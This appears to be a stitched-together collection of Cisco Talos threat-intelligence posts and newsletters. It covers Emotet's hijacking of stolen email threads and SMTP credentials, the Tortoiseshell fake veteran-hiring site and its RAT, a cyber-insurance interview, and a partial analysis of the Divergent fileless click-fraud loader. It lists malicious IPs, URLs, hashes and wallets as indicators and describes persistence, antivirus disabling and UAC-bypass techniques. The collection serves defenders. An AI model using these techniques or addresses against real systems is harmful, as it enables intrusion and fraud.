46[.]173[.]217[.]80
5[.]56[.]133[.]246

SHA-256

2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1
fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220
2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb
829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08
8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec
1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27
0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5
f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a
34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976
a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1
4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c
8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21
991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e
a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1
9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3
d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d

Monero Wallets

49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126
4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L

This blog post was written by Colin Grady, William Largent, and Jaeson Schultz.


Emotet is still evolving, five years after its debut as a banking trojan. It is one of the world's most dangerous botnets and malware droppers-for-hire. The malware payloads dropped by Emotet serve to more fully monetize their attacks, and often include additional banking trojans, information stealers, email harvesters, self-propagation mechanisms and even ransomware.

At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer begins drawing to a close, Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. While this reemergence may have many users scared, Talos' traditional Emotet coverage and protection remains the same. We have a slew of new IOCs to help protect users from this latest push, but past Snort coverage will still block this malware, as well traditional best security practices such as avoiding opening suspicious email attachments and using strong passwords.

Emotet's email propagation

One of Emotet's most devious methods of self-propagation centers around its use of socially engineered spam emails. Emotet's reuse of stolen email content is extremely effective. Once they have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.


The email above illustrates Emotet's social engineering. In this example, we have a malicious email from Emotet, and contained inside the body of the email we can see a previous conversation between two aides to the mayor of a U.S. city.

1. Initially, Lisa sent an email to Erin about placing advertisements to promote an upcoming ceremony where the mayor would be in attendance.
2. Erin replied to Lisa inquiring about some of the specifics of the request.
3. Lisa became infected with Emotet. Emotet then stole the contents of Lisa's email inbox, including this message from Erin.
4. Emotet composed an attack message in reply to Erin, posing as Lisa. An infected Word document is attached at the bottom.

It's easy to see how someone expecting an email as part of an ongoing conversation could fall for something like this, and it is part of the reason that Emotet has been so effective at spreading itself via email. By taking over existing email conversations, and including real Subject headers and email contents, the messages become that much more randomized, and more difficult for anti-spam systems to filter.

Emotet's email sending infrastructure

This message wasn't sent using Lisa's own Emotet-infected computer through her configured outbound mail server. Instead, this email was transmitted from an Emotet infection in a completely different location, utilizing a completely unrelated outbound SMTP server.

It turns out that in addition to stealing the contents of victims' inboxes, Emotet also swipes victims' credentials for sending outbound email. Emotet then distributes these stolen email credentials to other bots in its network, who then utilize these stolen credentials to transmit Emotet attack messages.

In the process of analyzing Emotet, Cisco Talos has detonated hundreds of thousands of copies of the Emotet malware inside of our malware sandbox, Threat Grid. Over the past 10 months, Emotet has attempted to use Threat Grid infections as outbound spam emitters nearly 19,000 times.

When Emotet's C2 designates one of its infections as a spam emitter, the bot will receive a list of outbound email credentials containing usernames, passwords and mail server IP addresses. Over the past 10 months, Cisco Talos collected 349,636 unique username/password/IP combos. Of course, many larger networks deploy multiple mail server IP addresses, and in the data we saw a fair amount of repeat usernames and passwords using different, but related mail server IPs. Eliminating the server IP data, and looking strictly at usernames and passwords, Talos found 202,675 unique username-password combinations.

Since Talos was observing infections over a monthslong timeframe, we were able to make an assessment regarding the average lifespan of the credentials we saw Emotet distributing. In all, the average lifespan of a single set of stolen outbound email credentials was 6.91 days. However, when we looked more closely at the distribution, 75 percent of the credentials stolen and used by Emotet lasted under one day. Ninety-two percent of the credentials stolen by Emotet disappeared within one week. The remaining 8 percent of Emotet's outbound email infrastructure had a much longer lifespan.

In fact, we found some outbound credentials that were utilized by Emotet for the entire duration of our sample data. Below is a graph illustrating the volume of credentials having a longer lifespan with days along the X-axis vs. the number of stolen SMTP credentials along the Y-axis. There are quite a few stolen outbound email credentials that Emotet has been using over a period of many months. Talos is reaching out to the affected networks in an attempt to remediate some of the current worst offenders.

Emotet's recipients

As opposed to simply drafting new attack messages, stealing old email messages and jumping into the middle of an existing email conversation is a fairly expensive thing to do. Looking at all the email Emotet attempted to send during the month of April 2019, we found Emotet included stolen email conversations only approximately 8.5 percent of the time. Since Emotet has reemerged, however, we have seen an increase in this tactic with stolen email threads appearing in almost one quarter of Emotet's outbound emails.

Emotet also apparently has a considerable database of potential recipients to draw from. Looking at all of the intended recipients of Emotet's attack messages in April 2019, we found that 97.5 percent of Emotet's recipients received only a single message. There was however, one victim, who managed to receive ten Emotet attack messages during that same period. Either Emotet has something against that guy in particular, or more likely, it is simply an artifact about the method Emotet uses to distribute victim email addresses to its outbound spam emitters.

A word about passwords

Emotet's stolen outbound email credentials contained over 176,000 unique passwords, so we decided to have a look at the passwords by themselves, without regard to the username or mail server IP. Below is a list of the most common passwords, and on the left hand side is the number of unique outbound SMTP credentials found utilizing that particular password.


It comes as no surprise that perennially problematic passwords such as "123456" and "password" (along with numerous variations of those) appear with a significant degree of prominence. However, there are other passwords in the set that are much more unique in terms of "Why would so many different accounts use that same strange password?" Most likely these are victims of Emotet who themselves controlled a large number of distinct email boxes while also committing the cybersecurity cardinal sin of reusing the same password across many different accounts.

Conclusion

Emotet has been around for years, this reemergence comes as no surprise. The good news is, the same advice for staying protected from Emotet remains. To avoid Emotet taking advantage of your email account, be sure to use strong passwords and opt in to multi-factor authentication, if your email provider offers that as an option. Be wary of emails that seem to be unexpected replies to old threads, emails that seem suspiciously out of context, or those messages that come from familiar names but unfamiliar email addresses. As always, you can rely on Snort rules to keep your system and network protected, as well. Previous Snort rules Talos has released will still protect from this wave of Emotet, and there is always the opportunity for new coverage in the future.

This is also a good opportunity to recognize that security researchers and practitioners can never take their foot off the gas. When a threat group goes silent, it's unlikely they'll be gone forever. Rather, this opens up the opportunity for a threat group to return with new IOCs, tactics, techniques and procedures or new malware variants that can avoid existing detection. Just as we saw earlier this year with the alleged breakup of the threat actors behind Gandcrab, it's never safe to assume a threat is gone for good.

IoCs

Indicators of compromise related to Emotet's latest activity can be found here.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We’re all still trying to shake off the summer. Gone are the early Fridays, beach vacations and days by the pool. Turns out, attackers may be brushing the same things off. The ever-present Emotet went quiet over the summer, but it’s back now with a slew of new campaigns. While this may sound concerning, the same protections and coverage you’ve always used will keep you safe.

And, speaking of things that won’t stay down, cryptocurrency miners still aren’t going anywhere. We've discovered a new threat actor we’re calling “Panda” that is rapidly spreading miners, even as digital currencies decline in value.

This was also a busy week for vulnerability discovery. We’ve got three new vulnerability spotlights out: the Aspose PDF API, Atlassian’s Jira software and the AMD ATI Radeon line of graphics cards.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

Title: Remote code execution vulnerability in some AMD Radeon cards 
Description: A line of AMD Radeon cards contains a remote code execution vulnerability in their ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMWare Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shared inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to gain the ability to remotely execute code on the victim machine.
Snort SIDs: 49978, 49979 (Written by Tim Muniz)

Title: Atlassian Jira service contains multiple vulnerabilities, including remote JavaScript execution
Description: Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is a piece of software that allows users to create, manage and organize tasks and manage projects. These bugs could create a variety of scenarios, including the ability to execute code inside of Jira and the disclosure of information inside of tasks created in Jira, including attached documents.
Snort SIDs: 50110, 50111 (Written by Amit Raut), 50114 (Written by Josh Williams)

Most prevalent malware files this week

By Warren Mercer and Paul Rascagneres with contributions from Jungsoo An.

Introduction

Cisco Talos recently discovered a threat actor attempting to take advantage of Americans who may be seeking a job, especially military veterans. The actor, previously identified by Symantec as Tortoiseshell, deployed a website called hxxp://hiremilitaryheroes[.]com that posed as a website to help U.S. military veterans find jobs. The URL is strikingly close to the legitimate service from the U.S. Chamber of Commerce, https://www.hiringourheroes.org. The site prompted users to download an app, which was actually a malware downloader, deploying malicious spying tools and other malware.

This is just the latest actions by Tortoiseshell. Previous research showed that the actor was behind an attacker on an IT provider in Saudi Arabia. For this campaign Talos tracked, Tortoiseshell used the same backdoor that it has in the past, showing that they are relying on some of the same tactics, techniques and procedures (TTPs).

Fake veteran hiring website

The fake website, called "Hire Military Heroes" (hxxp://hiremilitaryheroes[.]com/), which immediately goes after veterans with an image from the movie "Flags of our Fathers."


The website is only composed of three links to download a desktop app for free. The app is a fake installer. Contrary to standard malware installers, this one does not need to be silent, as the user expects an installation. Here's a look at the user interface, and the error message is always displayed to suggest something has "stopped" the app from accessing its database.



The progress bar almost fills up entirely, and then displays an error message:


The installer checks if Google is reachable. If not, the installation stops. If it is reachable, the installer downloads two binaries from hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=UID:



The downloaded binaries are stored in base64. One of the binaries is a tool used to perform a reconnaissance stage on the system and the second is the Remote Administrative Tool. The RAT is executed as a service. The installer installs the service first (for the -install argument) and then stops/starts the service with the command and control (C2) server IP in argument:



If something fails during the installation, an email is sent to the attacker. The credentials are hardcoded in the installer. The email account is ericaclayton2020@gmail[.]com and the error email is sent to marinaparks108@gmail[.]com.

Reconnaissance phase

The downloaded reconnaissance tool is named "bird.exe" on the system and the internal name is Liderc. Liderc is a unique supernatural being of Hungarian folklore. The original form of this creature is a chicken, that would explain the name of the dropped PE on the system, "Bird.exe."

The purpose is to collect a lot of information on the victim machine:





The attacker retrieves information such as the date, time and drivers. The attacker can then see information on the system, the patch level, the number of processors, the network configuration, the hardware, firmware versions, the domain controller, the name of the admin, the list of the account, etc. This is a significant amount of information relating to a machine and makes the attacker well-prepared to carry out additional attacks. The attacker even gets the size of the screen by using WMI, which is potentially a trick to identify if the system is a sandbox.

All this information is sent by email by using the same emails:

Remote access tool

This actor also deploys a RAT named "IvizTech" on the system. The code and features are similar to the ones outlined by Symantec. The IP is put in argument to the service. The attackers hoped that this would make it impossible to get to the C2, as the installer is needed — you can't just get there with the RAT itself. This allows an attacker to have a malware that they can add modules onto (no need to recompile when you want to update the C2). Requiring the installer also could make it more complicated for researchers to access the C2 and get hands-on analysis of the malware.

The malware has four features:

• kill_me: It stops the service and removes the malware
• Upload: It downloads a file on the internet
• Unzip: It uses PowerShell to unzip and execute code on the system
• And finally, the malware can execute a command

Conclusion

This new campaign utilizing the malicious hiring website represents a massive shift for Tortiseshell. This particular attack vector has the potential to allow a large swath of people to become victims of this attack. Americans are quick to give back and support the veteran population. Therefore, it's this website has a high chance of gaining traction on social media where users could share the link in the hopes of supporting veterans.

At the time of publication, we do not have a method of distribution used, nor do we have proof of this existing in the wild. The level of sophistication is low as the .NET binary used has poor OPSEC capabilities, such as hard-coded credentials, but then other more advanced techniques by making the malware modular and aware that the victim already ran it. There is a possibility that multiple teams from an APT worked on multiple elements of this malware, as we can see certain levels of sophistication existing and various levels of victimology.

Coverage

Intrusion prevention systems such as SNORT® provide an effective tool to detect Tortoiseshell activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Network

hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=H7ddew3rfJid97fer374887sdnJDgsdte
hxxp://66[.]42[.]78[.]193/response/
hxxp://66[.]42[.]78[.]193/statement/
hxxp://hiremilitaryheroes[.]com/

Samples

Installers:

c121f97a43f4613d0a29f31ef2e307337fa0f6d4f4eee651ee4f41a3df24b6b5
2a9589538c563c006eaf4f9217a192e8a34a1b371a31c61330ce2b396b67fd10
55b0708fed0684ce8fd038d4701cc321fe7b81def7f1b523acc46b6f9774cb7b

Reconnaissance PE:

ec71068481c29571122b2f6db1f8dc3b08d919a7f710f4829a07fb4195b52fac

RAT:

51d186c16cc609ddb67bd4f3ecd09ef3566cb04894f0496f7b01f356ae260424

Additional IOCs related to this actor

41db45b0c51b98713bc526452eef26074d034b2c9ec159b44528ad4735d14f4a
78e1f53730ae265a7eb00b65fbb1304bbe4328ee5b7f7ac51799f19584b8b9d4
46873290f58c25845b21ce7e560eae1b1d89000e887c2ff2976d931672390dd8
f31b5e14314388903a32eaa68357b8a5d07cbe6731b0bd97d2ee33ac67ea8817
f1c05ff306e941322a38fffb21dfdb5f81c42a00a118217b9d4e9807743d7275
1848f51d946fa8b348db8ef945a1ebff33ff76803ad26dfd175d9ea2aa56c7d0
ed150d9f6e12b6d669bcede3b7dc2026b7161f875edf26c93296e8c6e99152d5
2682328bde4c91637e88201eda5f5c400a3b3c0bdb87438d35660494feff55cf
e82a08f1514ccf38b3ae6b79e67d7605cb20b8377206fbdc44ddadfb06ae4d0d



185[.]43[.]108[.]134
162[.]220[.]55[.]249

Spreadme[.]international

"You rock" installer snippet:

Y2K is known for being one of the most widespread times of panic in IT. It was generally thought that on Dec. 31, 1999, computers across the globe would shut down when they would fail to properly process that it would become the year 2000 the next day.

It made headlines across the globe, sent everyone with a computer into a panic and even led to the creation of several U.S. government task forces to prepare for the problem.

But what you may not know is that Y2K spawned the birth of cyber security insurance.

In the buildup of panic, companies became worried that they would lose all their information stored on computers or would lose all ability to operate come Jan. 1, 2000. It was around this time that companies and organizations started to consider mitigating the risk regarding computers and digital storage.

Leslie Lamb was actually one of the first people to even negotiate for a security insurance policy on Cisco’s behalf. Today, the popularity of cyber insurance has exploded as government agencies, small cities, companies and non-profits worry about the rise in ransomware attacks.

Recent studies suggest having a cyber insurance policy could actually be more attractive to attackers, but companies like to have the policies to cover them if they lose substantial revenue, data or operating time as the result of a cyber attack. Many security experts consider it to be one of the tools that should be considered to mitigate an organization’s risk.

So what, exactly, goes into these policies? And how have they changed over time? To get a better idea of how cyber insurance works, and what, exactly, it covers, we sat down with Lamb, Cisco’s director of global risk and resiliency management. Below, we have edited our Q&A for brevity and clarity.

Why do you think cyber insurance has become such a popular trend recently?

Well, cyber insurance is not actually new. That is a misconception that a lot of people hold.

It’s been around for at least 10-15 years. It has just recently taken off.

Over the past five years, it has grown exponentially because of the high profile nature of some cyber incidents. People are aware of what’s going on … no one is immune to having a cyber incident. It’s becoming one of the largest areas for companies to focus on. I’ve been paying attention to cyber for a long time. People thought there’d be major impacts, but there haven’t been……until about 6 or 7 years ago, when we started to see large companies, government entities and even our infrastructure attacked and at risk. Now, people are really starting to look at it.

How have these policies changed since Y2K, then?

They’ve changed dramatically over the past five years.

That whole space has completely blossomed. I would say 6 - 7 years ago … there were a lot of gaps in the coverage.   For example, it was very difficult to find Business Interruption coverage, which would cover costs for loss of revenue. Companies were submitting claims to their insurance carriers and were finding that they were not covered. Insurance companies started to realize there were gaps in coverage, and they started to make these policies much broader and much more meaningful to their customers’ specific risks.

Most cyber policies have deductibles; both monetary and time bound deductibles or waiting periods. Most people are familiar with monetary deductibles, but may not be familiar with time bound deductibles.  An example of a time bound or waiting period would be when a company has a network outage, they may have to wait for 24 or 48 hours before their coverage would kick in.  The larger the company or exposure, typically the larger the monetary and/or longer the time bound deductibles might be. 

Are there any aspects of these policies that you feel people wouldn’t normally think about?
A few examples of coverage that are currently found in the market place and that some people may not know about is coverage for physical damage to hardware or business interruption to help pay for the loss of revenue while the impacted operation is down.

What are some things that stand out to you when you consider what goes into buying Cisco’s cyber insurance policies?

I purchased the first cyber insurance policy that Cisco had, and I purchased it ahead of the curve or before many companies were even considering the purchase.

Generally, we start 120 days out [from when the policy expires]. We essentially do a roadshow for the insurers and present to them what we do as a company. We bring in [Cisco’s CISO] and other internal experts to showcase our mitigation strategies, how we would manage any issue and we discuss our overall governance and internal policies. 

We also talk about all of the different partnerships across the enterprise that help mitigate the risk.  This is about education and awareness. This isn’t about just IT, it’s about forming internal partnerships to manage the risk. There’s legal, there’s HR, there’s risk management and others all at the table.

What are some of the things companies can do to help mitigate risk ahead of time to temper the cost of their policies? 

Making sure their network is safe, providing education and awareness to employees ... having a good business resiliency program in place, doing tabletop exercises to ensure everyone knows their role and everyone knows what to do or not do if they have cyber insurance. Many policies have certain requirements in place, so if you want coverage, you should definitely read the policy ahead of time and know what’s included, what’s not included and what the insurer requires. Many insurers have a panel of experts included in the policy that insured entity can access. People should know about these experts ahead of time and how they might use them.

We don’t live in a world anymore where it’s just four walls and a router. Everything is interconnected.

How can insurance policies address that?

That’s a really complex question, but it depends. … Let’s just say for example [a contract manufacturer], because of the way they put together our gear, causes a cyber problem for one of our customers. We would have a contract that requires the contracted manufacturer to have “network security liability” to cover the costs.

Our philosophy is … that if Cisco caused it, we’re going to pay for it. Whether we pay for it financially or our insurance policies, it’s our responsibility to pay for it. But if a third party causes it, we need them to pay for it, which is why we get involved in requiring our third party vendors to have certain types of insurance.

Recorded Sept. 13, 2019 

In one of our "rantier" episodes, the BWT crew dives into the ongoing insidiousness that is cryptomining with Watchbog, and then we turn our attention to some idiot that thinks charging people $50 to bypass MFA on their own machines is a good idea, because nothing bad can happen there, right? RIGHT?! Finally, we take a look at some recent breaches and the trend of attempting to downplay the severity of a breach because the data ex-fil wasn’t “vital or important.” Again, what can go wrong with that line of thinking? This is fine. Everything is just fine. Security is solved, we can go home now.

The timeline:

• 01:15 – Roundtable: BWT is infamous, a flying blunderbuss, Mighty Reds, new phones, opening night
• 15:00 — Pink fluffy ponies dancing on Monero
• 29:00 — Duo is your friend...bypassing MFA is not
• 36:00 — Dangers of denying breach severity
• 49:15 — Parting shots and closing thoughts

Some other links:

• Watchbog (Talos blog)
• Pink Fluffy Unicorns Dancing on Rainbows
• Miracle systems breach
• OPM breach info
• The $50k Twitter handle

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

An attacker known as “Tortoiseshell” is using a phony, malicious website to deliver malware. The site specifically targets U.S. military veterans who may be searching for a job. These types of sites are likely to be shared on social media as the general population hopes to support the veteran population.

Forget about the iPhone 11, impeachment or nation-state cyber attacks. We all know the biggest news of the past week was Area 51. And thankfully, the latest Beers with Talos talks about storming the secret military base. And some other, more cyber security-focused things.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

Title: New Emotet campaign emerges, but protection stays the same 
Description: At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer draws to a close, Cisco Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. The malware still mainly relies on socially engineered spam emails to spread. Once the attackers have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.
Snort SIDs: 47616, 47617, 48402, 49889, 43890 – 43892, 44559, 44560

Title: Aspose PDF API contains multiple remote code execution vulnerabilities
Description: There are multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API. 
Snort SIDs: 50730, 50731, 50738, 50739

Most prevalent malware files this week

Update (09/27/2019): Additional information regarding the malware interaction with various online advertisements has been included to highlight the click-fraud related network communications associated with Divergent.

Executive summary

Cisco Talos recently discovered a new malware loader being used to deliver and infect systems with a previously undocumented malware payload called "Divergent." We first dove into this malware after we saw compelling data from Cisco Advanced Malware Protection's (AMP) Exploit Prevention.

This threat uses NodeJS— a program that executes JavaScript outside of a web browser — as well as the legitimate open-source utility WinDivert to facilitate some of the functionality in the Divergent malware. The use of NodeJS is not something commonly seen across malware families.

The observed malware campaigns associated with Divergent feature the use of persistence techniques most commonly associated with "fileless" malware, leaving behind few artifacts for researchers to look at. This malware can be leveraged by an attacker to target corporate networks and appears to be primarily designed to conduct click-fraud. It also features several characteristics that have been observed in other click-fraud malware, such as Kovter.

Technical Details

Talos has identified a new moduler malware that is being used to facilitate the installation of a previously undocumented malware family, which we are referring to as Divergent, due to the naming convention used by the malware during variable declaration and the creation of environment variables. While we were unable to determine the delivery mechanism used, we were able to perform analysis of the malware loader as well as the Divergent malware that it is used to install on victim systems. Divergent is a malware family designed to generate revenue for attackers via the use of click-fraud, similar to other click-fraud malware such as Kovter. Technical details associated with both the installation and operation of the Divergent malware are described in the following sections.

Installation

The malware has many similarities with other popular fileless malware families, particularly Kovter. Like Kovter, it relies heavily on the registry for staging and storage of configuration data while avoiding more traditional on-access endpoint scanning of files on disk. It also uses a key in the registry to maintain persistence, and relies on PowerShell to install itself on the infected host.

When first delivered and executed on a victim's machine, the malware is in the portable executable (PE) format. Its first task, however, is to install itself to the system in a less suspicious form, namely as an HTML Application (HTA) that will load the malware from the registry.

Installation begins by creating several registry keys containing the different parts of the loader as well as the data of the malware PE. The malware reads all the information embedded in its data section and creates three new randomly named registry keys, each holding a different stage of the loader code needed to execute the malware PE using reflective injection.

Next, the HTA loader is written to the CSIDL_COMMON_APPDATA folder (typically C:\ProgramData\) and set to execute each time the user logs on by adding an entry to the "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" registry key.

An example of an HTA loader and the accompanying registry entries necessary to execute the malware once installed are:

• 17T21vYHOb.hta :: e4a49af295d6e61877a458a014fe63b733be942c506496b53070aa3d9ca421d8
• ZfjrAilGdH.reg :: 5863f35959aa542a27319e098f40166f3ace09d265f4ec6d739318c0b739745e

This registry file contains the following subkeys in the key HKLM\Software\ZfjrAilGdH which are set by the installation process (the key names are randomly generated and will be different for each installation):

• Lvt4wLGLMZ :: JScript executed by ZfjrAilGdh.hta
• kCu2DZ9WI0 :: PowerShell used to reflectively inject the malware
• 4FLJBnefsN :: hex data representing the malware PE

Fileless malware loader

The HTA is heavily obfuscated but when cleaned up, evaluates to an eval of the JScript in the registry key "HKLM\Software\ZfjrAilGdh\Lvt4wLGLMZ" via a "ActiveXObject.WScript.Shell.RegRead" (shown here as pseudo code):
The JScript in the reg key executes the following powershell (shown here deobfuscated):
This code will execute the code found in the registry location HKLM\Software\ZfjrAilGdH\kCu2DZ9WI0 after setting the variable regkeyname to the data found in the registry location HKLM\Software\ZfjrAilGdH\4FLJBnefsN. The registry key 4FLJBnefsN contains the bytes of the malicious portable executable (PE) with a modified DOS header, namely the MZ has been replaced with null bytes.

The code from kCu2DZ9WI0 is a version of PowerShell Empire's reflective PE injection script that will inject the malware:
At this point, the malware executes.

Divergent malware

There are two main parts of this threat: one to receive and execute commands from a C2 server and another to execute external component scripts. The configuration for each part is stored in the registry in JSON format.

The component configuration describes which components should be executed and how. This example configuration will execute three different JScript components:
Each entry is parsed, and each filename and args value is passed along for execution by the malware. Detailed analysis of the call_03 (see Now I See You), all_socks_05 (see Click Fraud), and block_av_01 (see Block AV Component) components can be found below.

The network configuration stores two classes of C2: "accl" is a list of URLs that the malware should attempt to contact for system information delivery and for commands to execute, while "acll" is a list of URLs the malware should attempt to contact for possible updates to either configuration file. The default values from ZfjrAilGdH.reg are:
Notice that "version" is an epoch timestamp, converting to Saturday, March 30, 2019 7:14:29 PM GMT. The earliest reference we found containing several IOCs from this malware sample dates back to February 2019.

Once executed, the malware begins with five anti-analysis checks. If any of these checks fail, a beacon is sent to a static URL containing a direct IP and sleeps indefinitely:
The beacon message indicates which anti-analysis check failed to pass. The malware checks for unwanted processes and loaded modules by hashing process file names and module names respectively, then comparing each hash against two separate pre-computed lists for each. The lists contain hashes for endpoint security software and hypervisor services as running the sample under both scenarios failed these checks. It also checks for a host CPU with at least two cores, the presence of a debugger, and finally compares system uptime intervals to determine if the sample is running within a sandbox or virtual machine.

If the process is running with the appropriate privileges, it uses WMI (Windows Management Instrumentation) to query recognized anti-virus software installed on the host. In particular, it's looking for the antivirus software Windows Defender. If found, it proceeds to disable various components of Windows Defender and Windows Updates.
Once completed, it attempts to bypass UAC using CMSTP, if needed. Additional code is executed to check for any updates to the malware's two configuration files. Empty POST requests are sent to each of the URLs in the first configuration's accl key. These URLs are later contacted with a comprehensive set of sensitive information from the host. Most are non-responsive but still online. Many appear to be, or once were, compromised hosts used for the C2 network.

